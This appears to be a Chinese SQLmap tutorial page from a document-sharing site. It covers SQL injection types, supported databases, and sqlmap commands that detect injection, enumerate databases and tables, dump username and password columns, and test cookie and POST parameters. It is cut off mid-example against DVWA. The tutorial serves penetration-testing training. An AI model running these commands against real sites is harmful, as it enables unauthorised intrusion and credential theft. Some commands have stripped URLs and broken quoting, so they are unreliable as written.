- 1、原创力文档(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
- 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
- 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
- 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
- 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
- 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
- 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
查看更多
一、什么是SQLmap?
SQLmap是一款用来检测与利用SQL注入漏洞的免费开源工具,用Python编写。
二、如何下载SQLmap?
可以通过位于SourceForge的官方网站下载SQLmap源码:/projects/sqlmap/
三、参考资源
SQL注入之SQLmap入门 /articles/web/29942.html
sqlmap使用参数详解 /kali_linux/article/details四、sqlmap支持五种不同的注入模式:
1、基于布尔的盲注,即可以根据返回页面判断条件真假的注入。
2、基于时间的盲注,即不能根据页面返回内容判断任何信息,用条件语句查看时间延迟语句是否执行(即页面返回时间是否增加)来判断。
3、基于报错注入,即页面会返回错误信息,或者把注入的语句的结果直接返回在页面中。
4、联合查询注入,可以使用union的情况下的注入。
5、堆查询注入,可以同时执行多条语句的执行时的注入。
五、sqlmap支持的数据库
MySQL, Oracle, PostgreSQL, Microsoft SQL Server, Microsoft Access, IBM DB2, SQLite, Firebird, Sybase和SAP MaxDB
六、检测注入基本格式
1、sqlmap -u “/post.php?id=1″
默认使用level1,默认检测全部数据库类型
2、sqlmap -u “/post.php?id=1″ --dbms mysql --level 3
指定数据库类型为mysql,级别为3(共5级,级别越高,检测越全面)
3、使用cookie注入
sqlmap -u /shownews.asp --cookie id=11 --level 2(只有level达到2才会检测cookie)
七、注入成功后获取数据库基本信息
1、sqlmap -u /post.php?id=1 --level 3 --dbs
//查询有哪些数据库
2、sqlmap -u “/post.php?id=1” --level 3 --current-db //查询当前数据库
3、sqlmap -u /post.php?id=1 --level 3 -D test --tables
//查询test数据库中有哪些表
4、sqlmap -u /post.php?id=1 --level 3 -D test -T admin --columns //查询test数据库中admin表有哪些字段
5、sqlmap -u /post.php?id=1 --level 3 -D test -T admin -C username, password --dump
//dump出字段username与password中的数据
八、举例:
C:\Documents and Settings\Administratorsqlmap.py -u /8
/index.php?id=1 --current-db //查询当前数据库
八、举例:
C:\Documents and Settings\Administratorsqlmap.py -u /8
/index.php?id=1 -D my_db --tables //查询my_db数据库中有哪些表
八、举例:
C:\Documents and Settings\Administratorsqlmap.py -u /8
/index.php?id=1 -D my_db -T thiskey --columns
//查询my_db数据库中thiskey表有哪些字段
九、POST注入
扫描网站:
/Login.asp
命令一:
sqlmap -u /Login.asp --data tfUName=11tfUPass=13“
--level=3
注: “tfUName=11tfUPass=13“ 为POST传递的参数。
九、POST注入
扫描网站:
/Login.asp
命令二:
sqlmap -r search-test.txt -p tfUPass
其中search-test.txt的内容为BurpSuite所抓的post包
十、扫描DVWA示例(使用cookie参数)
使用SQLmap之前我们得到需要当前会话cookies等信息,用来在渗透过程中维持连接状态,可以使用Firefox中名为“TamperData”的add-on获取。
当前得到的cookie为“security=low;PHPSESSID=57p5
您可能关注的文档
最近下载
- 2011届高考化学一轮复习专题模拟检测:专题5_氮族元素及其化合物.doc VIP
- Unit6大单元教学整体单元分析课件人教版九年级英语全册.ppt
- 教育信息化背景下跨学科教学资源的数字化建设.docx
- 城镇直埋供热管道电预热安装施工工法(技术方案).pdf VIP
- 2014造口治疗师培训个案发展计划及产品册造口学校.pdf VIP
- 标准化乡镇卫生院制度.doc
- 2026年湖南科技职业学院单招职业技能考试必刷测试卷完美版.docx VIP
- 2024年9月8日贵州省黔西南州州直遴选(事业单位考聘)笔试真题及答案解析.doc VIP
- 2025年兵棋章节答案.docx VIP
- 酒店工程部计件量化方案(3篇).docx VIP
文档评论(0)